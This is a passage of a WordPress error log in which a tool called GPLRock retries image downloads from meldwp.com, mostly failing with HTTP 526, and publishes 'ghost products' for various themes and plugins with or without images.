https://meldwp.com/wp-content/uploads/wordpress-push-notifications---woocommerce-push-notifications-15726.webp for product wordpress-push-notifications-woocommerce-push-notifications after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:25:31 UTC] GPLRock WARNING: Image download failed for product wordpress-push-notifications-woocommerce-push-notifications. URL: https://meldwp.com/wp-content/uploads/wordpress-push-notifications---woocommerce-push-notifications-15726.webp [05-Apr-2026 13:25:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-push-notifications-woocommerce-push-notifications [05-Apr-2026 13:25:31 UTC] GPLRock: Image download failed for product woocommerce-ultimate-reports (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:25:33 UTC] GPLRock: Image download failed for product woocommerce-ultimate-reports (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:25:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-ultimate-reports-6652.webp for product woocommerce-ultimate-reports after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:25:36 UTC] GPLRock: Image download failed for product woocommerce-ultimate-reports (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:25:38 UTC] GPLRock: Image download failed for product woocommerce-ultimate-reports (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:25:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-ultimate-reports-6652.webp for product woocommerce-ultimate-reports after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:25:40 UTC] GPLRock WARNING: Image download failed for product woocommerce-ultimate-reports. URL: https://meldwp.com/wp-content/uploads/woocommerce-ultimate-reports-6652.webp [05-Apr-2026 13:25:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-ultimate-reports [05-Apr-2026 13:25:40 UTC] GPLRock: Image download failed for product wp-jobs-board-ajax-search-and-filter-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:25:42 UTC] GPLRock: Image download failed for product wp-jobs-board-ajax-search-and-filter-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:25:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-jobs-board---ajax-search-and-filter-wordpress-plugin-26656.webp for product wp-jobs-board-ajax-search-and-filter-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:25:44 UTC] GPLRock: Image download failed for product wp-jobs-board-ajax-search-and-filter-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:25:46 UTC] GPLRock: Image download failed for product wp-jobs-board-ajax-search-and-filter-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:25:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-jobs-board---ajax-search-and-filter-wordpress-plugin-26656.webp for product wp-jobs-board-ajax-search-and-filter-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:25:48 UTC] GPLRock WARNING: Image download failed for product wp-jobs-board-ajax-search-and-filter-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/wp-jobs-board---ajax-search-and-filter-wordpress-plugin-26656.webp [05-Apr-2026 13:25:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wp-jobs-board-ajax-search-and-filter-wordpress-plugin [05-Apr-2026 13:26:16 UTC] GPLRock: Image downloaded successfully for product posts-table-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-98a1d7a1.jpg [05-Apr-2026 13:26:16 UTC] GPLRock: Using pre-downloaded image for product posts-table-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-98a1d7a1.jpg [05-Apr-2026 13:26:16 UTC] GPLRock: Ghost product published with image - Product ID: posts-table-pro [05-Apr-2026 13:26:18 UTC] GPLRock: Image downloaded successfully for product woocommerce-canada-post-shipping-method (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-60d0aa14.jpg [05-Apr-2026 13:26:18 UTC] GPLRock: Using pre-downloaded image for product woocommerce-canada-post-shipping-method: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-60d0aa14.jpg [05-Apr-2026 13:26:18 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-canada-post-shipping-method [05-Apr-2026 13:26:19 UTC] GPLRock: Image downloaded successfully for product woocommerce-amazon-fulfillment (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-89fb5eed.jpg [05-Apr-2026 13:26:19 UTC] GPLRock: Using pre-downloaded image for product woocommerce-amazon-fulfillment: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-89fb5eed.jpg [05-Apr-2026 13:26:19 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-amazon-fulfillment [05-Apr-2026 13:26:21 UTC] GPLRock: Image downloaded successfully for product pixia-showcase-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ca32c436.jpg [05-Apr-2026 13:26:21 UTC] GPLRock: Using pre-downloaded image for product pixia-showcase-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ca32c436.jpg [05-Apr-2026 13:26:21 UTC] GPLRock: Ghost product published with image - Product ID: pixia-showcase-wordpress-theme [05-Apr-2026 13:26:23 UTC] GPLRock: Image downloaded successfully for product mythemeshop-purple-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a9896465.jpg [05-Apr-2026 13:26:23 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-purple-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a9896465.jpg [05-Apr-2026 13:26:23 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-purple-wordpress-theme [05-Apr-2026 13:26:24 UTC] GPLRock: Image downloaded successfully for product array-themes-checkout-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ceefba1f.jpg [05-Apr-2026 13:26:24 UTC] GPLRock: Using pre-downloaded image for product array-themes-checkout-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ceefba1f.jpg [05-Apr-2026 13:26:24 UTC] GPLRock: Ghost product published with image - Product ID: array-themes-checkout-wordpress-theme [05-Apr-2026 13:26:26 UTC] GPLRock: Image downloaded successfully for product soliloquy-css-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b57b3660.jpg [05-Apr-2026 13:26:26 UTC] GPLRock: Using pre-downloaded image for product soliloquy-css-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b57b3660.jpg [05-Apr-2026 13:26:26 UTC] GPLRock: Ghost product published with image - Product ID: soliloquy-css-addon [05-Apr-2026 13:26:27 UTC] GPLRock: Image downloaded successfully for product woocommerce-pay-your-price (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6d391f3d.jpg [05-Apr-2026 13:26:27 UTC] GPLRock: Using pre-downloaded image for product woocommerce-pay-your-price: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6d391f3d.jpg [05-Apr-2026 13:26:27 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-pay-your-price [05-Apr-2026 13:26:29 UTC] GPLRock: Image downloaded successfully for product woocommerce-search-engine (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1be4e358.jpg [05-Apr-2026 13:26:29 UTC] GPLRock: Using pre-downloaded image for product woocommerce-search-engine: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1be4e358.jpg [05-Apr-2026 13:26:29 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-search-engine [05-Apr-2026 13:26:31 UTC] GPLRock: Image downloaded successfully for product css-igniter-benson-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8bc6011f.jpg [05-Apr-2026 13:26:31 UTC] GPLRock: Using pre-downloaded image for product css-igniter-benson-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8bc6011f.jpg [05-Apr-2026 13:26:31 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-benson-wordpress-theme [05-Apr-2026 13:28:14 UTC] GPLRock: Image downloaded successfully for product studiopress-wellness-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7449bbd3.jpg [05-Apr-2026 13:28:14 UTC] GPLRock: Using pre-downloaded image for product studiopress-wellness-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7449bbd3.jpg [05-Apr-2026 13:28:14 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-wellness-pro-genesis-wordpress-theme [05-Apr-2026 13:28:16 UTC] GPLRock: Image downloaded successfully for product mythemeshop-frontpage-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5cab59ab.jpg [05-Apr-2026 13:28:16 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-frontpage-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5cab59ab.jpg [05-Apr-2026 13:28:16 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-frontpage-wordpress-theme [05-Apr-2026 13:28:18 UTC] GPLRock: Image downloaded successfully for product material-white-label-wordpress-admin-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-40dedd9b.jpg [05-Apr-2026 13:28:18 UTC] GPLRock: Using pre-downloaded image for product material-white-label-wordpress-admin-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-40dedd9b.jpg [05-Apr-2026 13:28:18 UTC] GPLRock: Ghost product published with image - Product ID: material-white-label-wordpress-admin-theme [05-Apr-2026 13:28:19 UTC] GPLRock: Image downloaded successfully for product themify-builder-image-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b5e32d3c.jpg [05-Apr-2026 13:28:19 UTC] GPLRock: Using pre-downloaded image for product themify-builder-image-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b5e32d3c.jpg [05-Apr-2026 13:28:19 UTC] GPLRock: Ghost product published with image - Product ID: themify-builder-image-pro [05-Apr-2026 13:28:21 UTC] GPLRock: Image downloaded successfully for product learndash-lms-gradebook (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c90cedd1.jpg [05-Apr-2026 13:28:21 UTC] GPLRock: Using pre-downloaded image for product learndash-lms-gradebook: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c90cedd1.jpg [05-Apr-2026 13:28:21 UTC] GPLRock: Ghost product published with image - Product ID: learndash-lms-gradebook [05-Apr-2026 13:28:23 UTC] GPLRock: Image downloaded successfully for product directory-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-92f924c5.jpg [05-Apr-2026 13:28:23 UTC] GPLRock: Using pre-downloaded image for product directory-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-92f924c5.jpg [05-Apr-2026 13:28:23 UTC] GPLRock: Ghost product published with image - Product ID: directory-wordpress-theme [05-Apr-2026 13:28:24 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-variable-pricing-switcher (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fa3864db.jpg [05-Apr-2026 13:28:24 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-variable-pricing-switcher: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fa3864db.jpg [05-Apr-2026 13:28:24 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-variable-pricing-switcher [05-Apr-2026 13:28:26 UTC] GPLRock: Image downloaded successfully for product css-igniter-palermo-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-89e9ca99.jpg [05-Apr-2026 13:28:26 UTC] GPLRock: Using pre-downloaded image for product css-igniter-palermo-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-89e9ca99.jpg [05-Apr-2026 13:28:26 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-palermo-wordpress-theme [05-Apr-2026 13:28:28 UTC] GPLRock: Image downloaded successfully for product multinews-multi-purpose-wordpress-newsmagazine (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0eca340b.jpg [05-Apr-2026 13:28:28 UTC] GPLRock: Using pre-downloaded image for product multinews-multi-purpose-wordpress-newsmagazine: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0eca340b.jpg [05-Apr-2026 13:28:28 UTC] GPLRock: Ghost product published with image - Product ID: multinews-multi-purpose-wordpress-newsmagazine [05-Apr-2026 13:28:30 UTC] GPLRock: Image downloaded successfully for product composer-responsive-multi-purpose-high-performance-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-23aa49ef.jpg [05-Apr-2026 13:28:30 UTC] GPLRock: Using pre-downloaded image for product composer-responsive-multi-purpose-high-performance-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-23aa49ef.jpg [05-Apr-2026 13:28:30 UTC] GPLRock: Ghost product published with image - Product ID: composer-responsive-multi-purpose-high-performance-wordpress-theme [05-Apr-2026 13:29:52 UTC] GPLRock: Image downloaded successfully for product wetravel-travel-and-tourism-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-012ed1d4.webp [05-Apr-2026 13:29:52 UTC] GPLRock: Using pre-downloaded image for product wetravel-travel-and-tourism-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-012ed1d4.webp [05-Apr-2026 13:29:52 UTC] GPLRock: Ghost product published with image - Product ID: wetravel-travel-and-tourism-template-kit [05-Apr-2026 13:29:53 UTC] GPLRock: Image downloaded successfully for product waves-startup-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-799103fd.webp [05-Apr-2026 13:29:54 UTC] GPLRock: Using pre-downloaded image for product waves-startup-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-799103fd.webp [05-Apr-2026 13:29:54 UTC] GPLRock: Ghost product published with image - Product ID: waves-startup-agency-elementor-template-kit [05-Apr-2026 13:29:55 UTC] GPLRock: Image downloaded successfully for product wasat-creative-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9143ebe1.jpg [05-Apr-2026 13:29:55 UTC] GPLRock: Using pre-downloaded image for product wasat-creative-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9143ebe1.jpg [05-Apr-2026 13:29:55 UTC] GPLRock: Ghost product published with image - Product ID: wasat-creative-portfolio-elementor-template-kit [05-Apr-2026 13:29:57 UTC] GPLRock: Image downloaded successfully for product visus-interior-design-architecture-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c86b5da9.webp [05-Apr-2026 13:29:57 UTC] GPLRock: Using pre-downloaded image for product visus-interior-design-architecture-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c86b5da9.webp [05-Apr-2026 13:29:57 UTC] GPLRock: Ghost product published with image - Product ID: visus-interior-design-architecture-elementor-template-kit [05-Apr-2026 13:29:58 UTC] GPLRock: Image downloaded successfully for product vissio-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-138846d3.webp [05-Apr-2026 13:29:58 UTC] GPLRock: Using pre-downloaded image for product vissio-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-138846d3.webp [05-Apr-2026 13:29:58 UTC] GPLRock: Ghost product published with image - Product ID: vissio-business-elementor-template-kit [05-Apr-2026 13:30:00 UTC] GPLRock: Image downloaded successfully for product visaplan-immigration-visa-consulting-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b94736c4.webp [05-Apr-2026 13:30:00 UTC] GPLRock: Using pre-downloaded image for product visaplan-immigration-visa-consulting-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b94736c4.webp [05-Apr-2026 13:30:00 UTC] GPLRock: Ghost product published with image - Product ID: visaplan-immigration-visa-consulting-elementor-template-kit [05-Apr-2026 13:30:01 UTC] GPLRock: Image downloaded successfully for product virtuware-saas-digital-company-elementor-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-100e90e3.webp [05-Apr-2026 13:30:01 UTC] GPLRock: Using pre-downloaded image for product virtuware-saas-digital-company-elementor-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-100e90e3.webp [05-Apr-2026 13:30:01 UTC] GPLRock: Ghost product published with image - Product ID: virtuware-saas-digital-company-elementor-kit [05-Apr-2026 13:30:03 UTC] GPLRock: Image downloaded successfully for product virtual-cryptocurency-blockchain-bitcoin-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-85e0de3e.webp [05-Apr-2026 13:30:03 UTC] GPLRock: Using pre-downloaded image for product virtual-cryptocurency-blockchain-bitcoin-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-85e0de3e.webp [05-Apr-2026 13:30:03 UTC] GPLRock: Ghost product published with image - Product ID: virtual-cryptocurency-blockchain-bitcoin-elementor-template-kit [05-Apr-2026 13:30:05 UTC] GPLRock: Image downloaded successfully for product vinso-insurance-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-08346cfc.webp [05-Apr-2026 13:30:06 UTC] GPLRock: Using pre-downloaded image for product vinso-insurance-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-08346cfc.webp [05-Apr-2026 13:30:06 UTC] GPLRock: Ghost product published with image - Product ID: vinso-insurance-elementor-template-kit [05-Apr-2026 13:40:14 UTC] GPLRock: Image download failed for product ftech-it-solution-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:40:16 UTC] GPLRock: Image download failed for product ftech-it-solution-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:40:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ftech---it-solution-technology-wordpress-theme-26134.webp for product ftech-it-solution-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:40:19 UTC] GPLRock: Image download failed for product ftech-it-solution-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:40:21 UTC] GPLRock: Image download failed for product ftech-it-solution-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:40:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ftech---it-solution-technology-wordpress-theme-26134.webp for product ftech-it-solution-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:40:23 UTC] GPLRock WARNING: Image download failed for product ftech-it-solution-technology-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ftech---it-solution-technology-wordpress-theme-26134.webp [05-Apr-2026 13:40:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ftech-it-solution-technology-wordpress-theme [05-Apr-2026 13:40:23 UTC] GPLRock: Image download failed for product roger-pet-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:40:25 UTC] GPLRock: Image download failed for product roger-pet-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:40:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/roger---pet-care-wordpress-theme-10013.webp for product roger-pet-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:40:27 UTC] GPLRock: Image download failed for product roger-pet-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:50:15 UTC] GPLRock: Image download failed for product falkorn-personal-blog-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:50:17 UTC] GPLRock: Image download failed for product falkorn-personal-blog-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:50:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/falkorn---personal-blog--magazine-wordpress-theme-30787.webp for product falkorn-personal-blog-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:50:19 UTC] GPLRock: Image download failed for product falkorn-personal-blog-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:50:21 UTC] GPLRock: Image download failed for product falkorn-personal-blog-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:50:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/falkorn---personal-blog--magazine-wordpress-theme-30787.webp for product falkorn-personal-blog-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:50:23 UTC] GPLRock WARNING: Image download failed for product falkorn-personal-blog-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/falkorn---personal-blog--magazine-wordpress-theme-30787.webp [05-Apr-2026 13:50:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: falkorn-personal-blog-magazine-wordpress-theme [05-Apr-2026 13:50:24 UTC] GPLRock: Image download failed for product webify-all-in-one-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:50:26 UTC] GPLRock: Image download failed for product webify-all-in-one-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:50:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/webify--all-in-one-elementor-wordpress-theme-31329.webp for product webify-all-in-one-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:50:28 UTC] GPLRock: Image download failed for product webify-all-in-one-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:50:30 UTC] GPLRock: Image download failed for product webify-all-in-one-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:50:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/webify--all-in-one-elementor-wordpress-theme-31329.webp for product webify-all-in-one-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:50:32 UTC] GPLRock WARNING: Image download failed for product webify-all-in-one-elementor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/webify--all-in-one-elementor-wordpress-theme-31329.webp [05-Apr-2026 13:50:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: webify-all-in-one-elementor-wordpress-theme [05-Apr-2026 13:50:32 UTC] GPLRock: Image download failed for product makeaholic-beauty-cosmetics-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:50:34 UTC] GPLRock: Image download failed for product makeaholic-beauty-cosmetics-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:50:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/makeaholic---beauty-cosmetics-wordpress-theme-12357.webp for product makeaholic-beauty-cosmetics-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:50:37 UTC] GPLRock: Image download failed for product makeaholic-beauty-cosmetics-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:50:39 UTC] GPLRock: Image download failed for product makeaholic-beauty-cosmetics-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:50:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/makeaholic---beauty-cosmetics-wordpress-theme-12357.webp for product makeaholic-beauty-cosmetics-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:50:41 UTC] GPLRock WARNING: Image download failed for product makeaholic-beauty-cosmetics-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/makeaholic---beauty-cosmetics-wordpress-theme-12357.webp [05-Apr-2026 13:50:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: makeaholic-beauty-cosmetics-wordpress-theme [05-Apr-2026 13:50:41 UTC] GPLRock: Image download failed for product gizmos-electronics-tech-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:50:43 UTC] GPLRock: Image download failed for product gizmos-electronics-tech-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:50:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gizmos---electronics--tech-shop-wordpress-theme-14632.webp for product gizmos-electronics-tech-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:50:45 UTC] GPLRock: Image download failed for product gizmos-electronics-tech-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:50:47 UTC] GPLRock: Image download failed for product gizmos-electronics-tech-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:50:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gizmos---electronics--tech-shop-wordpress-theme-14632.webp for product gizmos-electronics-tech-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:50:49 UTC] GPLRock WARNING: Image download failed for product gizmos-electronics-tech-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gizmos---electronics--tech-shop-wordpress-theme-14632.webp [05-Apr-2026 13:50:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gizmos-electronics-tech-shop-wordpress-theme [05-Apr-2026 13:50:50 UTC] GPLRock: Image download failed for product poopet-pet-care-center-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:50:52 UTC] GPLRock: Image download failed for product poopet-pet-care-center-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:50:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/poopet---pet-care-center-wordpress-theme--rtl-10579.webp for product poopet-pet-care-center-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:50:54 UTC] GPLRock: Image download failed for product poopet-pet-care-center-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:50:56 UTC] GPLRock: Image download failed for product poopet-pet-care-center-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:50:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/poopet---pet-care-center-wordpress-theme--rtl-10579.webp for product poopet-pet-care-center-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:50:58 UTC] GPLRock WARNING: Image download failed for product poopet-pet-care-center-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/poopet---pet-care-center-wordpress-theme--rtl-10579.webp [05-Apr-2026 13:50:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: poopet-pet-care-center-wordpress-theme-rtl [05-Apr-2026 13:50:58 UTC] GPLRock: Image download failed for product ecova-eco-environmental-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:51:00 UTC] GPLRock: Image download failed for product ecova-eco-environmental-wordpress-theme (attempt 2/3). HTTP Code: 526, 